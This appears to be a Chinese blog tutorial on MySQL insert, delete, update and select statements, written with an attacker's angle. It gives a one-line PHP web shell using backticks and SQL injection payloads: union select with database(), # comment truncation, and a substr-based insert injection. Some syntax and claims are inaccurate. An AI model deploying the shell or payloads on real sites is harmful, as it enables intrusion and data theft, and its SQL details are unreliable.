网站首页 > 博客文章 正文
增、删、改、查,贴码:
1、增加数据
- insert into table_name value ('1','2',3…)
- 也可以通过set指定添加的字段:insert into table_name set ('1',3…) value(1,2,3…)
那么第二条跟第一条有什么区别呢?
举个栗子:user表中有三个字段;
用第一条命令添加数据 value 值后面必须有三个值;
而用第二条命令 ,可以通过 set 设置指明 我就需要 添加 第一列和第三列的,第二列不需要填,那么value值就填俩个值就OK;
注:添加数据时可以同 ` 这个符号(ESC下面一个的按键)表明这是个字段,是MySQL的转义符,如: insert into user value (`juzi`,`20`) ;用于包含数据库名、表名、字段名,避免与其他关键字冲突;
小技巧:<?php $test=$_GET['zxc']; echo `$test`; ?> 这句话等效于 <?php eval($_GET['zxc']); ?> 这句话就是使用 ` 这个反勾号达到的效果;
2、删除数据
- delete from table_name where id=1; #删数据
- drop database db_name; #删数据库
- drop table table_name; #删表
3、修改数据
- update table_name set column_name='%d' where id =%d %d 作为可以替换的数据,column_name 是 字段名
4、查找数据
- select * from table_name #查找数据
- select column_name from table_name where column_name=%d %d 作为可以替换的数据
写个 查找数据 时的注入漏洞吧;
举栗:
若原查询语句为: select username from user where id='$id' 或为 select * from user where username='$username'&passwd='$passwd' 其中 $id、$username、$passwdd 是 通过浏览器 接收过来的变量,即可控变量;(假设没做过滤)
那么构造语句为:
$id = 0' union select 1,database(),'3
$username = 0' union select 1,database(),3#
$passwd = 不写也行
select username from user where id='0' union select 1,database(),'3' 以及 select * from user where username='0' union select 1,database(),3# '&passwd='' 井号后面不解析,注释了
那么再举个栗子:
通过 insert into 增加数据 构造注入;
insert into table_name value('1','2','3'...) 1,2,3为前端浏览器输入的内容,即可控制;
构造语句:insert into table_name value('1','0'+substr((select database()) from 1 for 1)+'0','3') 必要时,可以在 substr 外面加个 ASCII()进行转码;为什么这么写,上篇unfinish有提到;
猜你喜欢
- 2024-09-10 第三章 SQL数据字段、字段类型简介
- 2024-09-10 MySQL中查看数据表结构和字段信息的方法!查看字段数据类型
- 2024-09-10 解决mybatis-plus修改数据库字段数据为NULL时失效的问题
- 2024-09-10 如何较方便给上百张数据库表添加表字段
- 2024-09-10 建议收藏|ArcGIS中操作字段相关代码汇总
- 2024-09-10 如何把数据库表中某个字段的所有2.0,3.0带.0的数据批量修改为2,3
- 2024-09-10 MySQL数据库教程-数据表字段约束(mysql数据库字段长度限制)
- 2024-09-10 Excel工作表中的7个数据库函数,易懂易理解,方便且实用
- 2024-09-10 MySQL数据库知识汇总(数据库mysql知识点)
- 2024-09-10 在此强调,一定要注意数据库字段NULL的问题
你 发表评论:
欢迎- 最近发表
- 标签列表
-
- powershellfor (55)
- messagesource (56)
- aspose.pdf破解版 (56)
- promise.race (63)
- 2019cad序列号和密钥激活码 (62)
- window.performance (66)
- qt删除文件夹 (72)
- mysqlcaching_sha2_password (64)
- ubuntu升级gcc (58)
- nacos启动失败 (64)
- ssh-add (70)
- jwt漏洞 (58)
- macos14下载 (58)
- yarnnode (62)
- abstractqueuedsynchronizer (64)
- source~/.bashrc没有那个文件或目录 (65)
- springboot整合activiti工作流 (70)
- jmeter插件下载 (61)
- 抓包分析 (60)
- idea创建mavenweb项目 (65)
- vue回到顶部 (57)
- qcombobox样式表 (68)
- vue数组concat (56)
- tomcatundertow (58)
- pastemac (61)
本文暂时没有评论,来添加一个吧(●'◡'●)